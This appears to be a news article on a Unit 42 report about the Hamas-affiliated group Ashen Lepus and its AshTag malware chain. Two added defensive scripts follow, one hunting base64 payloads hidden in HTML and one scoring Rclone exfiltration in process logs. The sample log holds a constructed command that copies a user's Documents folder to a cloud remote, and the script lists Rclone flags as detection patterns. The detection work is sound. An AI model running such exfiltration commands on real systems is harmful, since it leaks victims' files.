While the physical battlefield in Gaza has dominated global headlines, a parallel, silent war has been raging in the digital shadows. A new report from Unit 42 reveals that Ashen Lepus (also known as WIRTE), a Hamas-affiliated advanced persistent threat (APT), has not only maintained its cyber-espionage operations throughout the Israel-Hamas conflict but has significantly upgraded its arsenal with a potent new malware suite dubbed “AshTag.”
Typically, kinetic warfare disrupts the digital operations of regional threat actors. Infrastructure is destroyed, and priorities shift. However, Ashen Lepus proved to be a notable exception.
“Ashen Lepus remained persistently active throughout the Israel-Hamas conflict, distinguishing it from other affiliated groups whose activities decreased over the same period,” researchers noted.
Far from retreating, the group used the chaos as a smokescreen to evolve. In the researchers’ words, “this campaign highlights a tangible evolution in Ashen Lepus’s operational security and tactics, techniques and procedures (TTPs).” The group has moved from moderate sophistication to advanced tradecraft, including custom payload encryption and in-memory execution to minimize its forensic footprint.
The centerpiece of this evolution is a modular .NET malware suite named AshTag.
“We labeled the malware components ‘Ash’ to reflect the basic, gritty attack resources that accumulate to choke system defenses, allowing the full attack to take hold,” the researchers explained.

The infection chain is a masterclass in modern evasion:
- The Lure: Victims are targeted with PDF decoys mimicking sensitive geopolitical documents, such as United Nations Security Council minutes or Arab League memos regarding Palestine.
- The Loader: A benign-looking binary side-loads a malicious DLL (AshenLoader), which opens the decoy PDF while silently retrieving the next stage.
- The Stager & Orchestrator: AshenStager pulls the final payload from hidden HTML tags on a compromised website. This payload, Ashen Orchestrator, then manages a suite of plugins directly in the system’s memory, never touching the disk.
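The stager step above relies on a payload parked inside the markup of a compromised, otherwise legitimate site, so the retrieval looks like ordinary web browsing. One way a defender can hunt for that kind of staging is to scan fetched pages (for example, from a web proxy cache) for long base64 runs that decode to an executable image or to high-entropy bytes. The script below is an added example and is not code from the Unit 42 report or from the AshTag tooling; the placement of the blob in an HTML comment, the length and entropy thresholds, and the sample page are all constructed assumptions for illustration.

```python
import base64
import binascii
import math
import re
from dataclasses import dataclass


@dataclass
class Candidate:
    offset: int          # where the encoded run starts in the page
    encoded_len: int     # length of the base64 text
    decoded_len: int     # length after decoding
    entropy: float       # Shannon entropy of the decoded bytes (0..8)
    looks_like_pe: bool  # decoded bytes start with the "MZ" DOS header


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: packed or encrypted payloads sit near 8, plain text near 4-5."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_embedded_payloads(html: str, min_encoded_len: int = 256,
                           min_entropy: float = 6.0) -> list[Candidate]:
    """Flag long base64 runs anywhere in the markup (comments, attributes, text)
    that decode to a PE image or to high-entropy bytes.
    The thresholds are assumptions chosen for this example."""
    run = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_encoded_len)
    hits = []
    for m in run.finditer(html):
        token = m.group(0)
        token += "=" * (-len(token) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all (e.g. a long identifier)
        ent = shannon_entropy(raw)
        is_pe = raw[:2] == b"MZ"
        if is_pe or ent >= min_entropy:
            hits.append(Candidate(m.start(), len(m.group(0)), len(raw), round(ent, 2), is_pe))
    return hits


# Constructed sample page: a fake PE-like blob (MZ header plus non-repeating bytes)
# hidden in an HTML comment, beside a long but boring run of 'A's that a naive
# "any long base64 string" rule would also hit. Neither is real malware.
FAKE_PAYLOAD = b"MZ\x90\x00\x03\x00\x00\x00" + bytes(range(256)) * 4
ENCODED = base64.b64encode(FAKE_PAYLOAD).decode()
SAMPLE_HTML = f"""<html><body>
<p>Meeting minutes (constructed sample page).</p>
<!-- {ENCODED} -->
<div id="fp" style="display:none">{'A' * 300}</div>
</body></html>"""


if __name__ == "__main__":
    for c in find_embedded_payloads(SAMPLE_HTML):
        print(c)
```

The run of 300 'A's decodes to all-zero bytes and is correctly ignored; only the MZ-headed blob is reported. In practice the entropy threshold matters more than the MZ check, because a stager that applies its own encryption layer (as the report says AshTag does) will not leave a recognizable header in the decoded bytes.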
Historically, Ashen Lepus focused its lens on immediate neighbors like the Palestinian Authority, Egypt, and Jordan. However, the new campaign reveals a widening aperture for intelligence collection.
“Recent campaigns show a significant expansion in operational scope… the group is now targeting entities in other Arabic-speaking nations, including Oman and Morocco.”
The attackers are particularly interested in diplomatic shifts, using lures related to Turkey’s relationship with the Palestinian administration to trick diplomats and government officials into clicking.
Once inside, Ashen Lepus doesn’t just sit and wait. The group engages in “hands-on activity,” actively navigating compromised networks to hunt for specific intelligence.
Researchers observed the attackers manually downloading documents “directly from a victim’s mail accounts, revealing the group’s main objective: obtaining specific, diplomacy-related documents.” To smuggle this stolen data out, they have adopted Rclone, a legitimate open-source cloud storage tool, effectively blending their exfiltration with benign cloud traffic.
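Because Rclone is a legitimate tool, blocking or alerting on its file name alone is weak: an operator can rename the binary. A more robust detection keys on what the command line looks like, since Rclone's subcommands (copy, sync, lsd, …), its flags and its "remote:path" addressing survive a rename. The triage script below is an added example, not code from the Unit 42 report; it runs over a handful of constructed JSON-lines process-creation events (the field names Image and CommandLine, the scoring weights and the threshold are assumptions for this example, while the subcommands and flags are Rclone's own).

```python
import json
import re
from pathlib import PureWindowsPath

# Subcommands and flags as documented by rclone itself; weights below are assumptions.
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto",
                      "lsd", "lsf", "ls", "mount", "serve"}
RCLONE_FLAGS = {"--config", "--transfers", "--bwlimit", "--no-check-certificate",
                "-P", "--progress", "--ignore-existing", "--max-age"}
# rclone addresses cloud storage as "<remote>:<path>". Requiring two or more name
# characters before the colon rules out Windows drive letters (C:\...); the
# lookahead rules out URL schemes such as https://.
REMOTE_ARG = re.compile(r"(?!https?:|ftp:)[A-Za-z][A-Za-z0-9_-]+:[^\s\"']*")


def score_process_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event (assumed fields: Image, CommandLine)."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    argv = event.get("CommandLine", "").split()
    score, reasons = 0, []
    if image == "rclone.exe":
        score += 2
        reasons.append("image is rclone.exe")
    if len(argv) > 1 and argv[1].lower() in RCLONE_SUBCOMMANDS:
        score += 2
        reasons.append(f"rclone-style subcommand {argv[1]!r}")
    remotes = [a for a in argv[1:] if REMOTE_ARG.fullmatch(a)]
    if remotes:
        score += 2
        reasons.append(f"remote-style argument {remotes[0]!r}")
    flags = [a for a in argv[1:] if a.split("=", 1)[0] in RCLONE_FLAGS]
    score += len(flags)
    if flags:
        reasons.append("rclone flags " + ", ".join(flags))
    return score, reasons


def triage(log_text: str, threshold: int = 3) -> list[dict]:
    """Parse JSON-lines process events and return those scoring at or above threshold."""
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        score, reasons = score_process_event(event)
        if score >= threshold:
            flagged.append({**event, "score": score, "reasons": reasons})
    return flagged


# Constructed sample events: a renamed rclone, an unrenamed rclone, and three
# benign tools (git, robocopy, scp) that should not be flagged.
SAMPLE_LOG = r"""
{"ts": "T+00s", "Image": "C:\\Users\\pub\\AppData\\Local\\Temp\\svchost.exe", "CommandLine": "svchost.exe copy C:\\Users\\pub\\Documents mega:backup --config C:\\Users\\pub\\AppData\\Roaming\\r.conf -P"}
{"ts": "T+07s", "Image": "C:\\Program Files\\Git\\cmd\\git.exe", "CommandLine": "git.exe push origin main"}
{"ts": "T+41s", "Image": "C:\\Windows\\System32\\Robocopy.exe", "CommandLine": "Robocopy.exe C:\\src D:\\dst /E"}
{"ts": "T+58s", "Image": "C:\\Tools\\rclone.exe", "CommandLine": "rclone.exe lsd gdrive:"}
{"ts": "T+77s", "Image": "C:\\Windows\\System32\\OpenSSH\\scp.exe", "CommandLine": "scp.exe report.pdf user@host:/tmp/"}
"""


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["Image"], hit["score"], hit["reasons"])
```

The renamed copy (svchost.exe in a user-writable Temp folder) and the unrenamed rclone.exe both score 6, while scp's user@host:/tmp/ argument does not match the remote pattern and robocopy's drive-letter paths are excluded by design, so neither crosses the threshold. Pairing a hit like this with an unusual parent process or a first-seen outbound connection to a cloud storage provider is what turns it into a high-confidence exfiltration alert.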